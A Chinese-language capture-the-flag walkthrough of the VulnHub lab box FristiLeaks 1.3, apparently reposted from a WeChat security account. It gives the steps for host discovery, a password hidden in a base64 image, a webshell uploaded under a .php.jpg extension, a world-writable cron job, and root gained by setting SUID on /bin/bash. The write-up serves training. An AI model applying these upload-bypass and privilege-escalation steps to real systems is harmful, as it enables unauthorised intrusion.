虚拟机信息
虚拟机下载地址:
https://www.vulnhub.com/entry/fristileaks-13,133/
虚拟机简介:需要手动将 VM 的 MAC 地址编辑为:08:00:27:A5:A6:76
目标:1个flag
级别:初级
1、主机探测
1、在VMware中指定主机MAC地址
2、通过netdiscover检测主机IP地址
netdiscover -r 192.168.207.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.145
查看开放80端口
3、渗透测试
3.1 HTTP渗透
1.访问站点信息如下
2.目录探测
nikto -host http://192.168.207.135/
发现在robots文件中存在三个目录
访问目录后均为一张图片
3.访问目录
根据网站首页提示访问fristi发现存在登录页面
4.查看网页源代码
发现账号信息:eezeepz
发现一串base64字符,并且隐藏在图片中
5.base64解码
保存文件,并解码为png图片
base64 -d decode > 2.png
打开图片查看内容,获取到值为:keKkeKKeKKeKkEkkEk
6.尝试登录成功
通过账号:eezeepz,密码:keKkeKKeKKeKkEkkEk成功登录
7.上传冰蝎马
修改添加冰蝎马文件后缀为.jpg,并进行上传
提示上传成功
8.访问测试
连接地址为:http://192.168.207.135/fristi/uploads/shell.php.jpg
3.2 主机渗透
1.查看当前用户权限
2.查看用户文件信息
查看notes.txt文件中提示,文件中提示可以通过执行/home/admin中的命令,输出到/tmp/runthis文件中
3.修改/home/admin文件权限
echo "/home/admin/chmod –R 777 /home/admin" > /tmp/runthis
4.进入admin目录
发现有三个比较可疑的文件
分别查看文件内容,其中cryptpass.py主要通过加密字符串进行rot13加密
5.修改脚本解密
加密脚本如下
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
解密脚本如下
import base64,codecs,sys
def decodeString(str):
decoded = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(decoded)
cryptoResult=decodeString(sys.argv[1])
print(cryptoResult)
解密后密码为:LetThereBeFristi!
3.3 权限提升
1.文件所有者
文件所有者为fristigod,可以尝试获取到密码切换为fristigod
2.切换用户权限
su - fristigod
id
3.查看历史命令
cat .bash_history
查看可以指定用户执行命令操作
4.指定命令执行
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
查看执行命令可以有root的UID权限
5.配置suid二进制并提权
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom chmod +s /bin/bash
bash -p
添加bash的suid权限,并通过suid提权
6.获取flag
cd /root
cat fristileaks_secrets.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之FRISTILEAKS: 1.3
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论